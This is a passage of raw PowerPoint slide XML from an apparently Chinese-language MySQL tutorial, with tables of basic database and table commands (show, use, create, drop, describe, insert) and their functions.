                        <a:t>命令</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latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>功能</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82748384"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="800686">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>show  databases;</a:t>
                      </a:r>
                      <a:endParaRPr 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latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>查看服务器中当前有哪些数据库</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3064528"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="457535">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>use  </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>数据库名</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>;</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latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>选择所使用的数据库</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71029135"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="800686">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>create database </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>数据库名</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>;</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latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>创建数据库</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17898567"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="457535">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>drop database </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US">
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>数据库名</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>;</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latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>删除指定的数据库</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29171082"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="矩形 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="260064" y="4140510"/>
            <a:ext cx="10071547" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>mysql安装后默认会创建三个数据库information_schema、mysql和test, 其中名为“mysql”的数据库很重要,它里面保存有MYSQL的系统信息,用户修改密码和新增用户,实际上就是针对该数据库中的有关数据表进行操作。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="wKioL1fpIGuiWM6uAAAaKDEVHUg38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373" y="1022409"/>
            <a:ext cx="3409609" cy="230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45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数据表结构管理</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="3" name="表格 2"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="780432806"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="663892" y="855629"/>
          <a:ext cx="9716480" cy="2103120"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="4858240">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="227161180"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="4858240">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1010496978"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="0">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>MySQL</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>命令</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latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>功能</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73798557"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="0">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>create table </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US">
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>表名 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US">
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>字段设定列表</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>);</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latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>在当前数据库中创建数据表</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12420959"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="0">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>show  tables;</a:t>
                      </a:r>
                      <a:endParaRPr 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latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>显示当前数据库中有哪些数据表</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1071143"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="0">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>describe  [</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US">
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>数据库名</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>.]</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US">
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>表名</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>;</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latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>显示当前或指定数据库中指定数据表的结构</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US">
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>字段</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US">
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>信息</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1736689"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="0">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>drop table [</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US">
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>数据库名</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>.]</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US">
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>表名</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>;</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US">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latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>drop table [</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>数据库名</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>.]</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>表名</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>;</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="66675" marR="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2002915"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="矩形 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="556125" y="3262527"/>
            <a:ext cx="5517967" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>创建表的时候必须至少有一个列</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2050" name="Picture 2" descr="wKioL1fpIIjg1fIbAABEaDFXKuI7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412" y="3897186"/>
            <a:ext cx="606742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5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记录的查看、插入、修改与删除</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="4" name="表格 3"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2994294606"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="684523" y="882354"/>
          <a:ext cx="8639782" cy="5026622"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="4319891">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3264964724"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="4319891">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="39595740"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="285599">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>MySQL</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>命令</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="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latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>功能</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524025"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="622915">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>insert into </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>表名</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>字段</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>1,</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>字段</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>2,</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>……</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>) </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>values(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>字段</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>1</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>的值</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>字段</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>2</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>的值</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>,</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
